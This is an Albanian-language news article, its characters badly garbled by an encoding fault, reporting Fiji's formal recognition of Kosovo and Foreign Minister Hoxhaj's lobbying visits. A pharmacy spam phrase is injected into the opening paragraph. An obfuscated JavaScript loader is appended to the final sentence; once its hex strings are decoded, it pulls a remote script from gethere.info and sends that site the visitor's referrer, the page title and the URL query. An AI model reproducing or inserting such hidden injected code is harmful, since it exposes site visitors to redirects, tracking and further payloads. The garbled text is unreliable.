f.1122112655551_m

Arrin nota verbale e njohjes sA� KosovA�s nga Fixhi

buy strattera online fedex. Ministri i PunA�ve tA� Jashtme i RepublikA�s sA� KosovA�s, Enver Hoxhaj, ka pranuar notA�n verbale dhe njA� letA�r pA�r njohjen zyrtare tA� RepublikA�s sA� KosovA�s nga Republika e Fixhit.

NA� pA�rputhje tA� plotA� me njoftimin e para dy ditA�ve tA� kryeministrit tA� RepublikA�s sA� KosovA�s, Hashim ThaA�i, i cili ka bA�rA� publik nA� mbledhjen e QeverisA� sA� KosovA�s, njohjen e RepublikA�s sA� KosovA�s nga ky shtet, nota verbale konfirmon kA�tA� akt tA� rA�ndA�sishA�m pA�r shtetin e KosovA�s.

NA� letrA�n qA� ministri i PunA�ve tA� Jashtme dhe BashkA�punimit NdA�rkombA�tar i Fixhit, Inoke Kubuabola, i ka dA�rguar ministrit Hoxhaj, konfirmohet vendimi zyrtar i QeverisA� sA� RepublikA�s sA� Fixhit pA�r njohjen formale tA� pavarA�sisA� sA� KosovA�s.

a�?DA�shiroj tA� ju njoftoj se me kA�tA� njohje formale, Fixhi shpreh gatishmA�rinA� qA� tA� procedohet vendosja formale e marrA�dhA�nieve diplomatike ndA�rmjet dy shteteve tonaa�?, thuhet nA� letrA�n e ministrit Kubuabola, dA�rguar ministrit Hoxhaj.

NA� letA�r po ashtu shprehet vullneti i QeverisA� sA� Fixhit, qA� pas njohjes formale tA� pavarA�sisA� sA� KosovA�s, tA� thellohet bashkA�punimi si dhe shkA�mbimet e pA�rvojave nA� forumet ndA�rkombA�tare ndA�rmjet dy shteteve tona.

Ministri i PunA�ve tA� Jashtme i KosovA�s, Enver Hoxhaj, gjatA� kA�tij viti ka pasur kontakte tA� shpeshta dhe takime direkte me liderA�t e kA�tij shteti.

NA� muajin gusht, nA� kuadA�r tA� vizitave lobuese nA� Oqeani, Hoxhaj ka zhvilluar edhe njA� vizitA� nA� RepublikA�n e Fixhit, ku ka zhvilluar takime me homologun Inoke Kubuabola dhe kryeministrin e Fixhit, duke kA�rkuar vendosjen e marrA�dhA�nieve diplomatike ndA�rmjet dy shteteve.

Po ashtu, nA� shtator, gjatA� pjesA�marrjes nA� takimin AsamblesA� sA� PA�rgjithshme tA� OKB-sA�, ministri Hoxhaj ka zhvilluar edhe njA� takim tjetA�r me homologun nga Fixhi, ku kishte marrA� pA�rkrahjen e kA�tij shteti pA�r shtetin e KosovA�s.

Republika e Fixhit shtrihet nA� pjesA�n jugore tA� Oqeanit PaqA�sor, ka kryeqytet Suvan dhe njA� popullsi prej mbi 800 mijA� banorA�.

Fixhi A�shtA� shtet anA�tar i Kombeve tA� Bashkuara nga tetori i vitit 1970.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}